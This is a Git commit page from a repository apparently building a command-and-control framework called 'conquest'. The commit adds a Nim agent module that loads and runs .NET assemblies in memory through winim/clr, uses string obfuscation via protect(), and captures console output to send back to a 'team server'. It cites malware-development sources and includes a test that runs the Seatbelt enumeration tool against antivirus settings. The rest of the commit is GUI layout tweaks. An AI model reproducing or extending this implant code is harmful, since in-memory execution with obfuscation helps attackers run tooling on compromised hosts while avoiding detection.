admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Implemented basic .NET assembly execution using winim/clr.

Browse Source
This commit is contained in:
Jakob Friedl
2025-09-12 15:06:28 +02:00
parent f0010694eb
commit 9b94a06ce9
3 changed files with 58 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

49
src/agent/core/clr.nim Normal file
View File

@@ -0,0 +1,49 @@
import winim/[lean, clr]
import os, strformat, strutils, sequtils
import ../../common/[types, utils]
#[
Executing .NET assemblies in memory
References:
- https://maldevacademy.com/new/modules/60?view=blocks
- https://github.com/chvancooten/NimPlant/blob/main/client/commands/risky/executeAssembly.nim
- https://github.com/itaymigdal/Nimbo-C2/blob/main/Nimbo-C2/agent/windows/utils/clr.nim
]#
import sugar
proc dotnetInlineExecuteGetOutput(assemblyBytes: seq[byte], arguments: seq[string] = @[]): string =
# The winim/clr library takes care of most of the heavy lifting for us here
# - https://github.com/khchen/winim/blob/master/winim/clr.nim
var assembly = load(assemblyBytes)
# Parsing the arguments to be passed to the assembly
var args = arguments.toCLRVariant(VT_BSTR)
# Redirect the output of the assembly to a .NET StringWriter so we can return it to the team server over the network
var
mscor = load(protect("mscorlib"))
io = load(protect("System.IO"))
Console = mscor.GetType(protect("System.Console"))
StringWriter = io.GetType(protect("System.IO.StringWriter"))
var stringWriter = @StringWriter.new()
var oldConsole = @Console.Out
@Console.SetOut(stringWriter)
# Execute the assemblies entry point
assembly.EntryPoint.Invoke(nil, toCLRVariant([args]))
# Reset console properties
@Console.SetOut(oldConsole)
return fromCLRVariant[string](stringWriter.ToString())
proc test*() =
var bytes = string.toBytes(readFile("C:\\Tools\\precompiled-binaries\\Enumeration\\Seatbelt.exe"))
var args = @["antivirus"]
var result = dotnetInlineExecuteGetOutput(bytes, args)
echo result

6
src/agent/main.nim
View File

@@ -68,5 +68,11 @@ proc main() =
except CatchableError as err: except CatchableError as err:
echo "[-] ", err.msg echo "[-] ", err.msg
import core/clr
when isMainModule: when isMainModule:
test()
quit(0)
main() main()

6
src/client/layout.ini
View File

@@ -57,8 +57,8 @@ Collapsed=0
DockId=0x00000002,1 DockId=0x00000002,1
[Window][Example: Console] [Window][Example: Console]
Pos=10,525 Pos=10,466
Size=2848,1160 Size=1888,523
Collapsed=0 Collapsed=0
DockId=0x00000002,1 DockId=0x00000002,1
@@ -96,5 +96,5 @@ DockSpace ID=0x85940918 Window=0x260A4489 Pos=10,43 Size=1888,946 Split=Y
DockNode ID=0x00000001 Parent=0x85940918 SizeRef=1024,421 Split=X DockNode ID=0x00000001 Parent=0x85940918 SizeRef=1024,421 Split=X
DockNode ID=0x00000003 Parent=0x00000001 SizeRef=613,159 CentralNode=1 Selected=0x61E02D75 DockNode ID=0x00000003 Parent=0x00000001 SizeRef=613,159 CentralNode=1 Selected=0x61E02D75
DockNode ID=0x00000004 Parent=0x00000001 SizeRef=409,159 Selected=0x5E5F7166 DockNode ID=0x00000004 Parent=0x00000001 SizeRef=409,159 Selected=0x5E5F7166
DockNode ID=0x00000002 Parent=0x85940918 SizeRef=1024,523 Selected=0x4AD091E6 DockNode ID=0x00000002 Parent=0x85940918 SizeRef=1024,523 Selected=0x1BCA3180